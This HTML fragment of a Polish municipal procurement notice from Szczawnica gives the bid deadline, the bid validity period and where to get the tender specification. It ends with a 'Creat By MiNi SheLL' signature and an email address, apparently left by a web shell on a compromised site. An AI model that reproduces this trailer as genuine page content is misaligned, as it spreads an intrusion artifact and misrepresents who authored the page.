z obsługą administracyjno-organizacyjną umowy (np. zmiana konta bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje w przedmiotowej sprawie można otrzymać wysyłając zamówienie pocztą na adres: Urząd Miasta i Gminy Szczawnica, ul. Szalaya 103, 34-460 Szczawnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 11:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w budynku UMiG Szczawnica, ul. Szalaya 103, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com